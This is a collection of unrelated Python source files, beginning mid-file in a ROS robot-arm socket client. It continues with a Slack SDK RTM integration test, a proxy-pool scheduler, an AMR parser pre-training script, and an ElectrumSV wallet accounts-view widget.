pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
#Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ##接收策略端傳送手臂模式資料
socket_cmd.Speedmode = speedmode
def socket_talker(): ##創建Server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
pub.publish(state)
rate.sleep()
##----------socket 封包傳輸--------------##
##---------------socket 傳輸手臂命令-----------------
def Socket_command():
global Socket,arm_mode_flag,data
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 6 ##切換初始mode狀態
print(data)
print("Socket:", Socket)
Socket.send(data.encode('utf-8'))#socket傳送for python to translate str
##-----------socket client--------
def socket_client():
global Socket
try:
Socket = client()
#Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
print('Connection has been successful')
except socket.error as msg:
print(msg)
sys.exit(1)
#print('Connection has been successful')
print(Socket.get_recieve())
Socket_feedback(Socket)
# while 1:
# feedback_str = Socket.recv(1024)
# #手臂端傳送手臂狀態
# if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
# state_feedback.ArmState = 0
# if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
# state_feedback.ArmState = 1
# if str(feedback_str[2]) == '54':# 6 策略完成
# state_feedback.ArmState = 6
# print("shutdown")
# #確認傳送旗標
# if str(feedback_str[4]) == '48':#回傳0 false
# state_feedback.SentFlag = 0
# if str(feedback_str[4]) == '49':#回傳1 true
# state_feedback.SentFlag = 1
# ##---------------socket 傳輸手臂命令 end-----------------
# if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
# break
rospy.on_shutdown(myhook)
Socket.close()
def Socket_feedback(s):
Socket = s
while 1:
feedback_str = Socket.get_recieve()
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
state_feedback.ArmState = 0
if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
state_feedback.ArmState = 1
if str(feedback_str[2]) == '54':# 6 策略完成
state_feedback.ArmState = 6
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
state_feedback.SentFlag = 0
if str(feedback_str[4]) == '49':#回傳1 true
state_feedback.SentFlag = 1
##---------------socket 傳輸手臂命令 end-----------------
if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
break
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 6##切換初始mode狀態
## 多執行緒
t = threading.Thread(target=socket_client)
t.start() # 開啟多執行緒
#time.sleep(1)
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
## 多執行序 end
|
test_issue_701.py
|
import asyncio
import collections
import logging
import os
import threading
import time
import unittest
import pytest
from integration_tests.env_variable_names import SLACK_SDK_TEST_CLASSIC_APP_BOT_TOKEN
from integration_tests.helpers import async_test, is_not_specified
from slack import RTMClient, WebClient
class TestRTMClient(unittest.TestCase):
"""Runs integration tests with real Slack API
https://github.com/slackapi/python-slack-sdk/issues/701
"""
def setUp(self):
self.logger = logging.getLogger(__name__)
self.bot_token = os.environ[SLACK_SDK_TEST_CLASSIC_APP_BOT_TOKEN]
def tearDown(self):
# Reset the decorators by @RTMClient.run_on
RTMClient._callbacks = collections.defaultdict(list)
# @pytest.mark.skipif(condition=is_not_specified(), reason="to avoid rate_limited errors")
@pytest.mark.skip()
def test_receiving_all_messages(self):
self.rtm_client = RTMClient(token=self.bot_token, loop=asyncio.new_event_loop())
self.web_client = WebClient(token=self.bot_token)
self.call_count = 0
@RTMClient.run_on(event="message")
def send_reply(**payload):
self.logger.debug(payload)
web_client, data = payload["web_client"], payload["data"]
web_client.reactions_add(channel=data["channel"], timestamp=data["ts"], name="eyes")
self.call_count += 1
def connect():
self.logger.debug("Starting RTM Client...")
self.rtm_client.start()
rtm = threading.Thread(target=connect)
rtm.setDaemon(True)
rtm.start()
time.sleep(3)
total_num = 10
sender_completion = []
def sent_bulk_message():
for i in range(total_num):
text = f"Sent by <https://slack.dev/python-slackclient/|python-slackclient>! ({i})"
self.web_client.chat_postMessage(channel="#random", text=text)
time.sleep(0.1)
sender_completion.append(True)
num_of_senders = 3
senders = []
for sender_num in range(num_of_senders):
sender = threading.Thread(target=sent_bulk_message)
sender.setDaemon(True)
sender.start()
senders.append(sender)
while len(sender_completion) < num_of_senders:
time.sleep(1)
expected_call_count = total_num * num_of_senders
wait_seconds = 0
max_wait = 20
while self.call_count < expected_call_count and wait_seconds < max_wait:
time.sleep(1)
wait_seconds += 1
self.assertEqual(total_num * num_of_senders, self.call_count, "The RTM handler failed")
@pytest.mark.skipif(condition=is_not_specified(), reason="to avoid rate_limited errors")
@async_test
async def test_receiving_all_messages_async(self):
self.rtm_client = RTMClient(token=self.bot_token, run_async=True)
self.web_client = WebClient(token=self.bot_token, run_async=False)
self.call_count = 0
@RTMClient.run_on(event="message")
async def send_reply(**payload):
self.logger.debug(payload)
web_client, data = payload["web_client"], payload["data"]
await web_client.reactions_add(channel=data["channel"], timestamp=data["ts"], name="eyes")
self.call_count += 1
# intentionally not waiting here
self.rtm_client.start()
await asyncio.sleep(3)
total_num = 10
sender_completion = []
def sent_bulk_message():
for i in range(total_num):
text = f"Sent by <https://slack.dev/python-slackclient/|python-slackclient>! ({i})"
self.web_client.chat_postMessage(channel="#random", text=text)
time.sleep(0.1)
sender_completion.append(True)
num_of_senders = 3
senders = []
for sender_num in range(num_of_senders):
sender = threading.Thread(target=sent_bulk_message)
sender.setDaemon(True)
sender.start()
senders.append(sender)
while len(sender_completion) < num_of_senders:
await asyncio.sleep(1)
expected_call_count = total_num * num_of_senders
wait_seconds = 0
max_wait = 20
while self.call_count < expected_call_count and wait_seconds < max_wait:
await asyncio.sleep(1)
wait_seconds += 1
self.assertEqual(total_num * num_of_senders, self.call_count, "The RTM handler failed")
|
scheduler.py
|
import time
from multiprocessing import Process
from proxypool.api import app
from proxypool.getter import Getter
from proxypool.tester import Tester
from proxypool.setting import *
from proxypool.db import RedisClient
class Scheduler():
def schedule_tester(self, cycle=TESTER_CYCLE):
"""
定时测试代理
"""
tester = Tester()
while True:
print('测试器开始运行')
tester.run()
time.sleep(cycle)
def schedule_getter(self, cycle=GETTER_CYCLE):
"""
定时获取代理
"""
getter = Getter()
while True:
print('开始抓取代理')
getter.run()
time.sleep(cycle)
def schedule_api(self):
"""
开启API
"""
app.run(API_HOST, API_PORT)
def run(self):
print('代理池开始运行')
if TESTER_ENABLED:
tester_process = Process(target=self.schedule_tester)
tester_process.start()
if GETTER_ENABLED:
getter_process = Process(target=self.schedule_getter)
getter_process.start()
if API_ENABLED:
api_process = Process(target=self.schedule_api)
api_process.start()
|
pre_train.py
|
import torch
import torch.distributed as dist
import torch.multiprocessing as mp
import argparse, os, random
from parser.data import Vocab, DataLoader, SRLDataLoader, DUM, END, CLS, NIL, DynamicDataLoader
from parser.parser import Parser
from parser.work import show_progress
from parser.extract import LexicalMap
from parser.adam import AdamWeightDecayOptimizer
from parser.utils import move_to_device, MyThread, eval
from parser.bert_utils import BertEncoderTokenizer, BertEncoder
from parser.postprocess import PostProcessor
from parser.work import parse_data
def parse_config():
parser = argparse.ArgumentParser()
parser.add_argument('--info', type=str)
parser.add_argument('--tok_vocab', type=str)
parser.add_argument('--lem_vocab', type=str)
parser.add_argument('--pos_vocab', type=str)
parser.add_argument('--ner_vocab', type=str)
parser.add_argument('--dep_rel_vocab', type=str)
parser.add_argument('--srl_vocab', type=str)
parser.add_argument('--concept_vocab', type=str)
parser.add_argument('--predictable_concept_vocab', type=str)
parser.add_argument('--predictable_word_vocab', type=str)
parser.add_argument('--rel_vocab', type=str)
parser.add_argument('--word_char_vocab', type=str)
parser.add_argument('--concept_char_vocab', type=str)
parser.add_argument('--pretrained_file', type=str, default=None)
parser.add_argument('--with_bert', dest='with_bert', action='store_true')
parser.add_argument('--bert_path', type=str, default=None)
parser.add_argument('--encoder_graph', dest='encoder_graph', action='store_true')
parser.add_argument('--decoder_graph', dest='decoder_graph', action='store_true')
parser.add_argument('--no_post_process', dest='no_post_process', action='store_true')
parser.add_argument('--use_srl', dest='use_srl', action='store_true')
parser.add_argument('--use_gold_predicates', dest='use_gold_predicates', action='store_true')
parser.add_argument('--use_gold_arguments', dest='use_gold_arguments', action='store_true')
parser.add_argument('--soft_mtl', dest='soft_mtl', action='store_true')
parser.add_argument('--loss_weights', dest='loss_weights', action='store_true')
parser.add_argument('--sum_loss', dest='sum_loss', action='store_true')
parser.add_argument('--word_char_dim', type=int)
parser.add_argument('--word_dim', type=int)
parser.add_argument('--pos_dim', type=int)
parser.add_argument('--ner_dim', type=int)
parser.add_argument('--dep_rel_dim', type=int)
parser.add_argument('--concept_char_dim', type=int)
parser.add_argument('--concept_dim', type=int)
parser.add_argument('--rel_dim', type=int)
parser.add_argument('--cnn_filters', type=int, nargs='+')
parser.add_argument('--char2word_dim', type=int)
parser.add_argument('--char2concept_dim', type=int)
parser.add_argument('--embed_dim', type=int)
parser.add_argument('--ff_embed_dim', type=int)
parser.add_argument('--num_heads', type=int)
parser.add_argument('--snt_layers', type=int)
parser.add_argument('--graph_layers', type=int)
parser.add_argument('--inference_layers', type=int)
parser.add_argument('--pred_size', type=int)
parser.add_argument('--argu_size', type=int)
parser.add_argument('--span_size', type=int)
parser.add_argument('--ffnn_size', type=int)
parser.add_argument('--ffnn_depth', type=int)
parser.add_argument('--dropout', type=float)
parser.add_argument('--unk_rate', type=float)
parser.add_argument('--epochs', type=int)
parser.add_argument('--train_data', type=str)
parser.add_argument('--silver_train_data', type=str)
parser.add_argument('--silver_data_loss_weight', type=float)
parser.add_argument('--dev_data', type=str)
parser.add_argument('--srl_data', type=str)
parser.add_argument('--train_batch_size', type=int)
parser.add_argument('--batches_per_update', type=int)
parser.add_argument('--dev_batch_size', type=int)
parser.add_argument('--lr_scale', type=float)
parser.add_argument('--weight_decay', type=float)
parser.add_argument('--warmup_steps', type=int)
parser.add_argument('--resume_ckpt', type=str, default=None)
parser.add_argument('--ckpt', type=str)
parser.add_argument('--print_every', type=int)
parser.add_argument('--eval_every', type=int)
parser.add_argument('--world_size', type=int)
parser.add_argument('--gpus', type=int)
parser.add_argument('--MASTER_ADDR', type=str)
parser.add_argument('--MASTER_PORT', type=str)
parser.add_argument('--start_rank', type=int)
return parser.parse_args()
def average_gradients(model):
size = float(dist.get_world_size())
for param in model.parameters():
if param.grad is not None:
dist.all_reduce(param.grad.data, op=dist.ReduceOp.SUM)
param.grad.data /= size
def update_lr(optimizer, lr_scale, embed_size, steps, warmup_steps):
lr = lr_scale * embed_size ** -0.5 * min(steps ** -0.5, steps * (warmup_steps ** -1.5))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
return lr
def data_proc(data, queue):
while True:
for x in data:
queue.put(x)
queue.put('EPOCHDONE')
def load_vocabs(args):
vocabs = dict()
vocabs['tok'] = Vocab(args.tok_vocab, 5, [CLS]) # remove the token frequence < 5 @kiro
vocabs['lem'] = Vocab(args.lem_vocab, 5, [CLS])
vocabs['pos'] = Vocab(args.pos_vocab, 5, [CLS])
vocabs['ner'] = Vocab(args.ner_vocab, 5, [CLS])
vocabs['dep_rel'] = Vocab(args.dep_rel_vocab, 5, [CLS])
if args.use_srl:
vocabs['srl'] = Vocab(args.srl_vocab, 50, [NIL])
vocabs['predictable_concept'] = Vocab(args.predictable_concept_vocab, 5, [DUM, END])
vocabs['predictable_word'] = Vocab(args.predictable_word_vocab, 5, [DUM, END]) # for AMR-to-Text @kiro
vocabs['concept'] = Vocab(args.concept_vocab, 5, [DUM, END])
vocabs['rel'] = Vocab(args.rel_vocab, 50, [NIL])
vocabs['word_char'] = Vocab(args.word_char_vocab, 100, [CLS, END])
vocabs['concept_char'] = Vocab(args.concept_char_vocab, 100, [CLS, END])
lexical_mapping = LexicalMap()
bert_encoder = None
if args.with_bert:
bert_tokenizer = BertEncoderTokenizer.from_pretrained(args.bert_path, do_lower_case=False)
vocabs['bert_tokenizer'] = bert_tokenizer
for name in vocabs:
if name == 'bert_tokenizer':
continue
print((name, vocabs[name].size, vocabs[name].coverage))
return vocabs, lexical_mapping
def main(local_rank, args):
vocabs, lexical_mapping = load_vocabs(args)
bert_encoder = None
if args.with_bert:
bert_encoder = BertEncoder.from_pretrained(args.bert_path)
for p in bert_encoder.parameters(): # fix bert @kiro
p.requires_grad = False
torch.manual_seed(19940117)
torch.cuda.manual_seed_all(19940117)
random.seed(19940117)
torch.set_num_threads(4)
torch.cuda.set_device(local_rank)
device = torch.device('cuda', local_rank) # totally read @kiro
print("#"*25)
print("Concerned important config details")
print("use graph encoder?", args.encoder_graph)
print("use graph decoder?", args.decoder_graph)
print("use srl for MTL?", args.use_srl)
print("use_gold_predicates?", args.use_gold_predicates)
print("use_gold_arguments?", args.use_gold_arguments)
print("soft mtl?", args.soft_mtl)
print("sum loss?", args.sum_loss)
print("loss_weights?", args.loss_weights)
print("silver_data_loss_weight", args.silver_data_loss_weight)
print("#"*25)
model = Parser(vocabs,
args.word_char_dim, args.word_dim, args.pos_dim, args.ner_dim, args.dep_rel_dim,
args.concept_char_dim, args.concept_dim,
args.cnn_filters, args.char2word_dim, args.char2concept_dim,
args.embed_dim, args.ff_embed_dim, args.num_heads, args.dropout,
args.snt_layers, args.graph_layers, args.inference_layers, args.rel_dim,
args.pretrained_file, bert_encoder,
device, args.sum_loss,
False)
print(Parser)
if args.world_size > 1:
torch.manual_seed(19940117 + dist.get_rank())
torch.cuda.manual_seed_all(19940117 + dist.get_rank())
random.seed(19940117 + dist.get_rank())
model = model.cuda(local_rank)
dev_data = DataLoader(vocabs, lexical_mapping, args.dev_data, args.dev_batch_size, for_train=False) # load data @kiro
pp = PostProcessor(vocabs['rel'])
weight_decay_params = []
no_weight_decay_params = []
for name, param in model.named_parameters():
if name.endswith('bias') or 'layer_norm' in name:
no_weight_decay_params.append(param)
else:
weight_decay_params.append(param)
grouped_params = [{'params': weight_decay_params, 'weight_decay': args.weight_decay},
{'params': no_weight_decay_params, 'weight_decay': 0.}]
optimizer = AdamWeightDecayOptimizer(grouped_params, 1., betas=(0.9, 0.999), eps=1e-6) # "correct" L2 @kiro
used_batches = 0
batches_acm = 0
if args.resume_ckpt: # false, not supported @kiro
ckpt = torch.load(args.resume_ckpt)
model.load_state_dict(ckpt['model'])
optimizer.load_state_dict(ckpt['optimizer'])
batches_acm = ckpt['batches_acm']
del ckpt
silver_file = open(args.silver_train_data, 'r')
print("read silver file from {}".format(args.silver_train_data))
silver_train_data = DynamicDataLoader(
vocabs, lexical_mapping, silver_file, args.train_batch_size, for_train=True
)
silver_train_data.set_unk_rate(args.unk_rate)
silver_queue = mp.Queue(10)
silver_train_data_generator = mp.Process(target=data_proc, args=(silver_train_data, silver_queue))
silver_data_loss_weight = 1.0 if args.silver_data_loss_weight is None else args.silver_data_loss_weight
silver_train_data_generator.start()
eval_tool = eval('%s/%s' % (args.ckpt, "checkpoint.txt"), args.dev_data, )
model.train()
epoch, loss_avg, srl_loss_avg, concept_loss_avg, arc_loss_avg, rel_loss_avg, concept_repr_loss_avg =\
0, 0, 0, 0, 0, 0, 0
silver_loss_avg, silver_concept_loss_avg, silver_arc_loss_avg, silver_rel_loss_avg, silver_concept_repr_loss_avg = \
0, 0, 0, 0, 0
max_training_epochs = int(args.epochs) # @kiro、
print("Start training...")
is_start = True
while epoch < max_training_epochs: # there is no stop! @kiro fixed by me
while True:
batch = silver_queue.get()
if isinstance(batch, str):
silver_train_data_generator.terminate()
silver_train_data_generator.join()
# read the next sample batches
silver_train_data = DynamicDataLoader(
vocabs, lexical_mapping, silver_file, args.train_batch_size, for_train=True
)
silver_train_data.set_unk_rate(args.unk_rate)
silver_queue = mp.Queue(10)
silver_train_data_generator = mp.Process(target=data_proc, args=(silver_train_data, silver_queue))
silver_train_data_generator.start()
if args.world_size == 1 or (dist.get_rank() == 0):
if len(silver_train_data.data) < 20000:
epoch += 1
model.eval()
output_dev_file = '%s/epoch%d_batch%d_dev_out' % (args.ckpt, epoch, batches_acm)
parse_data(model, pp, dev_data, args.dev_data, output_dev_file, args)
saved_model = '%s/epoch%d_batch%d' % (args.ckpt, epoch, batches_acm)
torch.save({'args': args,
'model': model.state_dict(),
'batches_acm': batches_acm,
'optimizer': optimizer.state_dict()},
saved_model)
eval_task = MyThread(eval_tool.eval, (output_dev_file, saved_model, not args.no_post_process))
eval_task.start()
model.train()
print('epoch', epoch, 'done', 'batches', batches_acm)
print('batches', batches_acm)
else:
batch = move_to_device(batch, model.device) # data moved to device
silver_concept_loss, silver_arc_loss, silver_rel_loss, silver_graph_arc_loss = model.forward(
batch, encoder_graph=args.encoder_graph, decoder_graph=args.decoder_graph)
# model forward, please note that graph_arc_loss is not used
loss = (silver_concept_loss + silver_arc_loss + silver_rel_loss) / args.batches_per_update # compute
loss_value = loss.item()
silver_concept_loss_value = silver_concept_loss.item()
silver_arc_loss_value = silver_arc_loss.item()
silver_rel_loss_value = silver_rel_loss.item()
# concept_repr_loss_value = concept_repr_loss.item()
silver_loss_avg = silver_loss_avg * args.batches_per_update * 0.8 + 0.2 * loss_value
silver_concept_loss_avg = silver_concept_loss_avg * 0.8 + 0.2 * silver_concept_loss_value
silver_arc_loss_avg = silver_arc_loss_avg * 0.8 + 0.2 * silver_arc_loss_value
silver_rel_loss_avg = silver_rel_loss_avg * 0.8 + 0.2 * silver_rel_loss_value
# concept_repr_loss_avg = concept_repr_loss_avg * 0.8 + 0.2 * concept_repr_loss_value
loss = silver_data_loss_weight * loss
loss.backward() # loss backward
used_batches += 1
if not (used_batches % args.batches_per_update == -1 % args.batches_per_update):
continue
batches_acm += 1
if args.world_size > 1:
average_gradients(model)
torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0)
lr = update_lr(optimizer, args.lr_scale, args.embed_dim, batches_acm, args.warmup_steps)
optimizer.step() # update the model parameters according to the losses @kiro
optimizer.zero_grad()
if args.world_size == 1 or (dist.get_rank() == 0):
if batches_acm % args.print_every == -1 % args.print_every:
print('Train Epoch %d, Batch %d, LR %.6f, conc_loss %.3f, arc_loss %.3f, rel_loss %.3f, concept_repr_loss %.3f, srl_loss %.3f' % (
epoch, batches_acm, lr, concept_loss_avg, arc_loss_avg, rel_loss_avg, concept_repr_loss_avg, srl_loss_avg))
print('==============>, silver_conc_loss %.3f, silver_arc_loss %.3f, silver_rel_loss %.3f' % (
silver_concept_loss_avg, silver_arc_loss_avg, silver_rel_loss_avg)
)
model.train()
# if (batches_acm > 100 or args.resume_ckpt is not None) and batches_acm % args.eval_every == -1 % args.eval_every:
break
silver_train_data_generator.terminate()
silver_train_data_generator.join()
print("Training process is done.") # @kiro
def init_processes(local_rank, args, backend='nccl'):
os.environ['MASTER_ADDR'] = args.MASTER_ADDR
os.environ['MASTER_PORT'] = args.MASTER_PORT
dist.init_process_group(backend, rank=args.start_rank + local_rank, world_size=args.world_size)
main(local_rank, args)
if __name__ == "__main__":
args = parse_config()
if not os.path.exists(args.ckpt): # create the ckpt dir @kiro
os.mkdir(args.ckpt)
assert len(args.cnn_filters) % 2 == 0
args.cnn_filters = list(zip(args.cnn_filters[:-1:2], args.cnn_filters[1::2]))
gpu_number = torch.cuda.device_count()
print("number of available GPUs", gpu_number)
args.world_size = args.gpus = gpu_number
if args.world_size == 1:
main(0, args)
exit(0)
mp.spawn(init_processes, args=(args,), nprocs=args.gpus)
|
accounts_view.py
|
import csv
from functools import partial
import json
import os
import threading
import time
from typing import List, Optional, Sequence
import weakref
from PyQt5.QtCore import QEvent, QItemSelectionModel, QModelIndex, pyqtSignal, QSize, Qt
from PyQt5.QtGui import QPainter, QPaintEvent
from PyQt5.QtWidgets import (QLabel, QListWidget, QListWidgetItem, QMenu, QSplitter, QTabWidget,
QTextEdit, QVBoxLayout)
from electrumsv.bitcoin import address_from_string, script_template_to_string
from electrumsv.constants import AccountType, DerivationType, KeystoreType
from electrumsv.i18n import _
from electrumsv.logs import logs
from electrumsv.wallet import AbstractAccount, MultisigAccount, Wallet
from .account_dialog import AccountDialog
from .main_window import ElectrumWindow
from .util import (Buttons, CancelButton, filename_field, line_dialog, MessageBox, OkButton,
protected, read_QIcon, WindowModalDialog)
class AccountsView(QSplitter):
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, main_window: ElectrumWindow, wallet: Wallet) -> None:
super().__init__(main_window)
self._logger = logs.get_logger("accounts-view")
self._main_window = weakref.proxy(main_window)
self._wallet = wallet
self._main_window.account_created_signal.connect(self._on_account_created)
self._main_window.account_change_signal.connect(self._on_account_changed)
# We subclass QListWidget so accounts cannot be deselected.
class CustomListWidget(QListWidget):
def selectionCommand(self, index: QModelIndex, event: Optional[QEvent]) \
-> QItemSelectionModel.SelectionFlags:
flags = super().selectionCommand(index, event)
if flags == QItemSelectionModel.Deselect:
return QItemSelectionModel.NoUpdate
return flags
def paintEvent(self, event: QPaintEvent) -> None:
super().paintEvent(event)
if self.count() > 0:
return
painter = QPainter(self.viewport())
painter.drawText(self.rect(), Qt.AlignCenter, _("Add your first account.."))
self._account_ids: List[int] = []
self._tab_widget = QTabWidget()
self._selection_list = CustomListWidget()
self._selection_list.setMinimumWidth(150)
self._selection_list.setIconSize(QSize(32, 32))
self._selection_list.setContextMenuPolicy(Qt.CustomContextMenu)
self._selection_list.customContextMenuRequested.connect(self._show_account_menu)
self._selection_list.currentItemChanged.connect(self._on_current_item_changed)
self._current_account_id: Optional[int] = None
self.addWidget(self._selection_list)
self.addWidget(self._tab_widget)
self.setChildrenCollapsible(False)
def on_wallet_loaded(self) -> None:
self._initialize_account_list()
def init_geometry(self, sizes: Optional[Sequence[int]]=None) -> None:
self._logger.debug("init_geometry.1 %r", sizes)
if sizes is None:
sizes = [ 200, self._main_window.size().width() - 200 ]
self._logger.debug("init_geometry.2 %r", sizes)
self.setSizes(sizes)
def _on_account_created(self, new_account_id: int, new_account: AbstractAccount) -> None:
# It should be made the active wallet account and followed up with the change event.
self._add_account_to_list(new_account)
def _on_account_changed(self, new_account_id: int, new_account: AbstractAccount) -> None:
# The list is being told what to focus on.
if self._update_active_account(new_account_id):
row = self._account_ids.index(new_account_id)
self._selection_list.setCurrentRow(row)
def _on_current_item_changed(self, item: QListWidgetItem, last_item: QListWidgetItem) -> None:
account_id = item.data(Qt.UserRole)
# This should update the internal tracking, and also the active wallet account.
if self._update_active_account(account_id):
account = self._main_window._wallet.get_account(account_id)
self._update_window_account(account)
def _update_active_account(self, account_id: int) -> bool:
if account_id == self._current_account_id:
return False
self._current_account_id = account_id
return True
def _update_window_account(self, account: AbstractAccount) -> None:
self._main_window.set_active_account(account)
def get_tab_widget(self) -> QTabWidget:
return self._tab_widget
def _initialize_account_list(self) -> None:
self._selection_list.clear()
self._account_ids.clear()
# TODO(rt12): These should respect user ordering, and perhaps also later hierarchy.
for account in self._wallet.get_accounts():
self._add_account_to_list(account)
if len(self._account_ids):
self._selection_list.setCurrentRow(0)
currentItem = self._selection_list.currentItem()
account_id = currentItem.data(Qt.UserRole)
if self._update_active_account(account_id):
account = self._main_window._wallet.get_account(account_id)
self._update_window_account(account)
def _add_account_to_list(self, account: AbstractAccount) -> None:
account_id = account.get_id()
item = QListWidgetItem()
keystore = account.get_keystore()
derivation_type = keystore.derivation_type if keystore is not None \
else DerivationType.NONE
is_watching_only = keystore.is_watching_only() if keystore is not None else True
icon_state = "inactive" if is_watching_only else "active"
if derivation_type == DerivationType.ELECTRUM_MULTISIG:
tooltip_text = _("Multi-signature account")
icon_filename = "icons8-group-task-80-blueui-{}.png"
elif derivation_type == DerivationType.HARDWARE:
tooltip_text = _("Hardware wallet account")
icon_filename = "icons8-usb-2-80-blueui-{}.png"
elif derivation_type == DerivationType.IMPORTED:
# This should not be watch only as imported public keys have no keystore.
tooltip_text = _("Imported private key account")
icon_filename = "icons8-key-80-plus-blueui-{}.png"
elif derivation_type == DerivationType.ELECTRUM_OLD:
tooltip_text = _("Old-style Electrum account")
icon_filename = "icons8-password-1-80-blueui-{}.png"
elif derivation_type == DerivationType.BIP32:
tooltip_text = _("BIP32 account")
icon_filename ="icons8-grand-master-key-80-blueui-{}.png"
else:
# This should always be watch only as imported public keys have no keystore.
tooltip_text = _("Imported public key account")
icon_filename = "icons8-key-80-plus-blueui-{}.png"
if is_watching_only:
tooltip_text += f" ({_('watch only')})"
item.setIcon(read_QIcon(icon_filename.format(icon_state)))
item.setData(Qt.UserRole, account_id)
item.setText(account.display_name())
item.setToolTip(tooltip_text)
self._selection_list.addItem(item)
self._account_ids.append(account_id)
def _show_account_menu(self, position) -> None:
item = self._selection_list.currentItem()
if not item:
return
account_id = item.data(Qt.UserRole)
account = self._wallet.get_account(account_id)
menu = QMenu()
self.add_menu_items(menu, account, self._main_window)
menu.exec_(self._selection_list.viewport().mapToGlobal(position))
def add_menu_items(self, menu: QMenu, account: AbstractAccount, main_window: ElectrumWindow) \
-> None:
menu.clear()
# This expects a reference to the main window, not the weakref.
account_id = account.get_id()
menu.addAction(_("&Information"),
partial(self._show_account_information, account_id))
seed_menu = menu.addAction(_("View &Secured Data"),
partial(self._view_secured_data, main_window=main_window, account_id=account_id))
seed_menu.setEnabled(self._can_view_secured_data(account))
menu.addAction(_("&Rename"),
partial(self._rename_account, account_id))
menu.addSeparator()
private_keys_menu = menu.addMenu(_("&Private keys"))
import_menu = private_keys_menu.addAction(_("&Import"), partial(self._import_privkey,
main_window=main_window, account_id=account_id))
import_menu.setEnabled(account.can_import_privkey())
export_menu = private_keys_menu.addAction(_("&Export"), partial(self._export_privkeys,
main_window=main_window, account_id=account_id))
export_menu.setEnabled(account.can_export())
if account.can_import_address():
menu.addAction(_("Import addresses"), partial(self._import_addresses, account_id))
menu.addSeparator()
hist_menu = menu.addMenu(_("&History"))
hist_menu.addAction("Export", main_window.export_history_dialog)
labels_menu = menu.addMenu(_("&Labels"))
action = labels_menu.addAction(_("&Import"),
partial(self._on_menu_import_labels, account_id))
labels_menu.addAction(_("&Export"), partial(self._on_menu_export_labels, account_id))
invoices_menu = menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), partial(self._on_menu_import_invoices, account_id))
payments_menu = menu.addMenu(_("Payments"))
ed_action = payments_menu.addAction(_("Export destinations"),
partial(self._generate_destinations, account_id))
keystore = account.get_keystore()
ed_action.setEnabled(keystore is not None and
keystore.type() != KeystoreType.IMPORTED_PRIVATE_KEY)
def _on_menu_import_labels(self, account_id: int) -> None:
self._main_window.do_import_labels(account_id)
def _on_menu_export_labels(self, account_id: int) -> None:
self._main_window.do_export_labels(account_id)
